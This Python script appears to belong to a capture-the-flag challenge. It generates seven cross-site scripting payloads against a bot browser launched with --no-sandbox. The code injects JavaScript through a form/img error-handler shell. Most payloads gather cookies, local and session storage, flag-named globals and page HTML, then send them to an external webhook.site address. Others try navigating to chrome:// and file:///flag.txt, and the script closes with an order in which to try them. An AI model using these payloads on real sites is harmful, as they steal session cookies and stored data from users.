#!/usr/bin/env python3
"""
ALTERNATIVE PAYLOADS - When CDP doesn't work
Based on different --no-sandbox exploitation techniques
"""

import os
import urllib.parse
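# Exfiltration endpoint. Read from the environment so the URL is not baked into
# source (and re-committed for every engagement); the default is the
# webhook.site inbox the original script used.
# CAVEAT: a webhook.site inbox is readable by anyone who holds the URL, so every
# cookie / flag these payloads POST there is effectively public. Use a listener
# you control for anything beyond a throwaway CTF box and rotate this one after use.
WEBHOOK = os.environ.get(
    "WEBHOOK", "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
)

RULE = "=" * 80

# Injection shell shared by every payload. Judging by the element ids, the
# target reads `errorReporter.path` and loads it as a script once the
# `renderConfig` image errors out, so a data:text/javascript URL in that field
# becomes arbitrary JS. (Inferred from the payload shape only — the target's
# code is not in this file; confirm against the challenge source.)
_SHELL = (
    '<form id="errorReporter"><input name="path" value="data:text/javascript,{js}">'
    '</form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
)


def build_payload(js: str, *, encode: bool = False) -> str:
    """Wrap a JavaScript snippet in the errorReporter/renderConfig shell.

    Args:
        js: JavaScript source to execute through the data: URL.
        encode: When True, collapse newlines to spaces and percent-encode the
            snippet. Required for multi-line code: the snippet sits inside a
            double-quoted HTML attribute, so raw newlines, `"` or `&` would
            break the markup. Single-line snippets that only use single
            quotes can be embedded raw (the browser accepts them as-is).

    Returns:
        The complete HTML payload string.
    """
    if encode:
        js = urllib.parse.quote(js.replace("\n", " "))
    return _SHELL.format(js=js)


# --- JavaScript bodies -------------------------------------------------------
# NOTE: document.cookie never exposes HttpOnly cookies; if the flag lives in an
# HttpOnly cookie none of the cookie-reading payloads below can see it.

# PAYLOAD 3: delayed snapshot of cookie/storage/location, in case the flag is
# populated asynchronously after page load.
_JS_DELAYED_DUMP = f"""
setTimeout(() => {{
    const data = {{
        cookie: document.cookie,
        location: location.href,
        title: document.title,
        storage: {{...localStorage}},
        windowProps: Object.keys(window).filter(k => k.toLowerCase().includes('flag'))
    }};
    fetch('{WEBHOOK}', {{
        method: 'POST',
        body: JSON.stringify(data)
    }});
}}, 5000);
"""

# PAYLOAD 6: poll once a second (max 10 tries) for window.FLAG / window.flag /
# any cookie, reporting either the first hit or a "not found" marker.
_JS_POLL_FLAG = f"""
let attempts = 0;
const check = setInterval(() => {{
    attempts++;
    if (window.FLAG || window.flag || document.cookie) {{
        fetch('{WEBHOOK}?flag=' + encodeURIComponent(window.FLAG || window.flag || document.cookie));
        clearInterval(check);
    }}
    if (attempts > 10) {{
        fetch('{WEBHOOK}?error=flag_not_found_after_10_attempts');
        clearInterval(check);
    }}
}}, 1000);
"""

# PAYLOAD 7: one-shot dump of everything the page can reach (cookies, both
# storages, location, document metadata, flag-ish globals, first 500 chars of
# body HTML) — the best first probe to learn what the bot's context contains.
_JS_FULL_DUMP = f"""
(async () => {{
    const data = {{
        timestamp: Date.now(),
        cookie: document.cookie,
        storage: {{
            local: Object.keys(localStorage).map(k => ({{key: k, val: localStorage[k]}})),
            session: Object.keys(sessionStorage).map(k => ({{key: k, val: sessionStorage[k]}}))
        }},
        location: {{
            href: location.href,
            origin: location.origin,
            pathname: location.pathname
        }},
        document: {{
            title: document.title,
            referrer: document.referrer,
            domain: document.domain
        }},
        window: {{
            FLAG: window.FLAG,
            flag: window.flag,
            flagKeys: Object.keys(window).filter(k => k.toLowerCase().includes('flag'))
        }},
        html: document.body.innerHTML.substring(0, 500)
    }};
    await fetch('{WEBHOOK}', {{method: 'POST', body: JSON.stringify(data, null, 2)}});
}})();
"""

# NOTE(review): payloads 2, 4 and 5 attempt renderer-initiated navigation from a
# web origin to chrome:// and file:// URLs. Stock Chromium refuses both
# ("Not allowed to load local resource"); `--no-sandbox` only disables the OS
# process sandbox and does not relax URL scheme policy, so expect these to fail
# unless the bot is launched with additional flags. They are kept because the
# script's purpose is to enumerate what the target does allow.

# One entry per payload, in print order:
# (number glyph, title, JavaScript body, percent-encode?, usage notes).
PAYLOADS: list[tuple[str, str, str, bool, list[str]]] = [
    (
        "1️⃣",
        "Confirm XSS Works",
        f"fetch('{WEBHOOK}?test=xss_works')",
        False,
        ["If webhook receives this, XSS is working!"],
    ),
    (
        "2️⃣",
        "Navigate to chrome://inspect/#pages",
        "setTimeout(()=>{window.location='chrome://inspect/%23pages'},100)",
        False,
        [
            "Tries to navigate to Chrome's internal inspect page",
            "You won't see webhook response, but bot might reveal flag in UI",
        ],
    ),
    (
        "3️⃣",
        "Delayed Cookie Check (5 seconds)",
        _JS_DELAYED_DUMP,
        True,
        [
            "Waits 5 seconds before checking cookie/storage",
            "Maybe flag is set asynchronously",
        ],
    ),
    (
        "4️⃣",
        "Navigate to file:// URL",
        "window.location='file:///flag.txt'",
        False,
        [
            "Different from fetch() - actually navigates to file://",
            "Might work with --no-sandbox",
        ],
    ),
    (
        "5️⃣",
        "Navigate to chrome://version",
        "window.location='chrome://version'",
        False,
        [
            "Tests if ANY chrome:// URLs are accessible",
            "chrome://version shows browser info",
        ],
    ),
    (
        "6️⃣",
        "Poll for window.FLAG",
        _JS_POLL_FLAG,
        True,
        [
            "Checks every second for 10 seconds",
            "Maybe flag appears in window.FLAG after delay",
        ],
    ),
    (
        "7️⃣",
        "Everything at Once (Comprehensive)",
        _JS_FULL_DUMP,
        True,
        [
            "Sends everything available to webhook",
            "Good for debugging what's actually accessible",
        ],
    ),
]

# Recommended order of attempts, printed after the payloads.
TESTING_ORDER: list[str] = [
    "Try PAYLOAD 1 first to confirm XSS works",
    "If XSS works, try PAYLOAD 7 to see what data is available",
    "If still no flag, try PAYLOAD 3 (delayed check)",
    "Try PAYLOAD 2 or 5 (chrome:// navigation)",
    "Try PAYLOAD 6 (polling for flag)",
]


def main() -> None:
    """Print every payload with its title and usage notes, then the test order."""
    print(RULE)
    print("ALTERNATIVE EXPLOITATION METHODS")
    print(RULE)
    print("\nTry these payloads in order if CDP didn't work:\n")

    for number, (glyph, title, js, encode, notes) in enumerate(PAYLOADS, start=1):
        print(f"\n{glyph}  PAYLOAD {number}: {title}")
        print(RULE)
        print(build_payload(js, encode=encode))
        # Blank line, one arrow-prefixed note per line, blank line.
        print("\n" + "\n".join(f"→ {note}" for note in notes) + "\n")

    print(RULE)
    print("TESTING ORDER:")
    print(RULE)
    for step, text in enumerate(TESTING_ORDER, start=1):
        prefix = "\n" if step == 1 else ""
        print(f"{prefix}{step}. {text}")
    print("\n" + RULE)


if __name__ == "__main__":
    main()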
